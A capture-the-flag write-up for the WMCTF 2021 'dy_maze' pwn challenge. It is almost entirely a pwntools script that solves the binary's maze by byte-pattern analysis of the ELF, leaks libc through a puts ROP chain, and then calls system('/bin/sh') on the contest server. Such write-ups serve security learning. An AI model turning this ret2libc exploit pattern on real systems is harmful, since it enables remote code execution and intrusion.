WMCTF 2021 pwn dy_maze writeup

import os
import tarfile
from binascii import a2b_base64

# Third-party star imports kept in their original order: later names
# shadow earlier ones, so reordering them could change what resolves.
from pwn import *
from LibcSearcher import *
# pwntools session settings: verbose I/O logging, a 64-bit Linux target,
# and the terminal that gdb.attach() uses to open the debugger window.
context.update(log_level='debug', os='linux', arch='amd64', bits=64)
context.terminal = ['/usr/bin/x-terminal-emulator', '-e']

# Flip to True to run and debug the challenge binary on this machine
# instead of connecting to the CTF service.
local = False
# Name the challenge binary is served under (the writeup first assigned
# "dy_maze" here and immediately overrode it with this value).
binary_name = "38a5a00c-08ac-11ec-b124-0242ac110003"
port = 44212

if local:
    p = process(["./" + binary_name])
    e = ELF("./" + binary_name)
    # libc = e.libc
else:
    p = remote("47.104.169.32", port)

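def z(a=''):
    """Attach gdb to the local process with the gdb command string *a*.

    Does nothing unless ``local`` is True. When no commands are given the
    script then blocks on input() so the debugger can be set up by hand
    before the exploit continues. Against the remote service it is a no-op.
    """
    if not local:
        return
    gdb.attach(p, a)
    if a == '':
        # raw_input() only exists on Python 2; this script is Python 3
        # (int.to_bytes, bytes literals and input() are used elsewhere),
        # so the original call would have raised NameError here.
        input()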

def ru(x):
    """Receive from the connection through the delimiter *x*."""
    return p.recvuntil(x)


def rc(x):
    """Receive up to *x* bytes from the connection."""
    return p.recv(x)


def sl(x):
    """Send *x* followed by a newline."""
    return p.sendline(x)


def sd(x):
    """Send *x* exactly as given."""
    return p.send(x)


def sla(delim, data):
    """Wait for *delim*, then send *data* followed by a newline."""
    return p.sendlineafter(delim, data)
def encode(payload, offset):
    """XOR-mask *payload* with the 5-byte key held in ``success_temp``.

    Byte ``i`` of *payload* is XORed with ``success_temp[(i + offset) % 5]``,
    so *offset* chooses where in the key stream the masking starts.
    ``success_temp`` is filled by the ELF analysis in the main block before
    this is called.
    """
    return bytes(
        byte ^ success_temp[(position + offset) % 5]
        for position, byte in enumerate(payload)
    )

# XOR key bytes recovered from the downloaded binary by the main block
# (the byte before each b'\x48\x98\x88\x54\x05\xEC' match); read by encode().
success_temp: list[int] = []
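if __name__ == "__main__":
    # Debug hook; only attaches a debugger when `local` is True (see z()).
    # z('b maze_25')
    z('b ok_success\n')

    # --- initialize ---
    # The service first prompts "Solution?"; the answer is typed in by hand.
    p.recvuntil(b'Solution?')
    confirm = input()
    sl(confirm)

    # --- create binary file ---
    # The challenge binary arrives as a base64-encoded bzip2 tar archive,
    # terminated by a line starting with "==".
    ru(b'Binary Download Start')
    ru(b'\n')
    b64_data = p.recvuntil(b'\n==', drop=True)
    with open('temp.bz2', 'wb') as f:
        f.write(a2b_base64(b64_data))

    ru(b'\n')
    # The archive came from the network, so it is untrusted input: unpack it
    # with tarfile rather than shelling out to `tar -xjvf`, keep only regular
    # files, and refuse member names that could escape the working directory.
    with tarfile.open('temp.bz2', 'r:bz2') as tar:
        members = [m for m in tar.getmembers() if m.isfile()]
        for m in members:
            if m.name.startswith('/') or '..' in m.name.split('/'):
                raise ValueError('refusing unsafe archive member: %r' % m.name)
        if len(members) != 1:
            raise ValueError('expected one file in the archive, got %d' % len(members))
        # Python 3.12+ (and backports) provide tarfile.data_filter; use it when present.
        extract_opts = {'filter': 'data'} if hasattr(tarfile, 'data_filter') else {}
        tar.extractall('.', members=members, **extract_opts)
    temp_binary = members[0].name
    e = ELF("./" + temp_binary)

    # --- ELF analysis ---
    # The binary exports maze_1 .. maze_80; order them by address so the
    # n-th code pattern found below is attributed to the n-th maze function.
    maze_symbols = {i: e.symbols['maze_{}'.format(i)] for i in range(1, 81)}
    maze_address = sorted(maze_symbols.items(), key=lambda item: item[1])

    # For each of the first 80 occurrences of `83 c0 01` (add eax, 1), walk
    # backwards to the nearest `83 7d fc` (cmp dword [rbp-4], imm8) and take
    # the immediate byte after it as that maze's expected key.
    key = {}
    for ind, addr in zip(range(80), e.search(b'\x83\xc0\x01')):
        addr -= 4
        while e.data[e.vaddr_to_offset(addr): e.vaddr_to_offset(addr) + 3] != b'\x83\x7d\xfc':
            addr -= 1
        key[maze_address[ind][0]] = e.data[e.vaddr_to_offset(addr) + 3]

    # XOR key bytes consumed by encode(): the byte preceding each
    # `48 98 88 54 05 ec` (cdqe; mov [rbp+rax-0x14], dl) sequence.
    for addr in e.search(b'\x48\x98\x88\x54\x05\xEC'):
        success_temp.append(e.data[e.vaddr_to_offset(addr) - 1])

    # `5f c3` decodes to `pop rdi; ret`, used below to set the first argument.
    prdi = next(e.search(b'\x5f\xc3'))
    # --- end analysis ---

    # key[80] = 32
    # Maze answer: the 80 keys separated by spaces, then 100 (the ok_success value).
    payload = b''.join(str(key[i]).encode('utf-8') + b' ' for i in range(1, 81))
    payload += str(100).encode('utf-8')
    sl(payload)
    sleep(2)
    # p.recvall()
    ru(b'Good')
    # sl(b'100')
    sleep(2)

    # Stage 1 ("input your name:"): 0x14 bytes of filler plus 8 more
    # (presumably the saved rbp), then puts(puts@got) to leak a libc address
    # and a return into ok_success so the name prompt appears again.
    payload = b'a' * 0x14 + b'b' * 8 + p64(prdi) + p64(e.got['puts']) + p64(e.plt['puts']) + p64(e.symbols['ok_success'])
    sl(encode(payload, 0))
    # sl(payload)
    sleep(2)
    ru(b'name: ')
    # The leaked pointer is printed as raw bytes; pad to 8 before unpacking.
    puts_addr = p.recvuntil(b'\n', drop=True).ljust(8, b'\x00')
    puts_addr = u64(puts_addr)
    log.success("puts addr found: " + hex(puts_addr))

    # Identify the remote libc from the leaked puts address and derive its base.
    libc = LibcSearcher('puts', puts_addr)
    # libc.select_libc(9)
    libc_base = puts_addr - libc.dump('puts')
    log.success('libc base found: ' + hex(libc_base))
    p.sendlineafter(b'length', str(100).encode('utf-8'))

    # Stage 2: system("/bin/sh"). `prdi + 1` points at the gadget's `c3`
    # byte, i.e. a lone `ret`, presumably inserted to keep the stack aligned
    # for system().
    payload = b'a' * 0x14 + b'b' * 8 + p64(prdi) + p64(libc.dump('str_bin_sh') + libc_base)
    payload += p64(prdi + 1) + p64(libc.dump('system') + libc_base)
    sla(b'name: ', encode(payload, 1))
    p.interactive()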
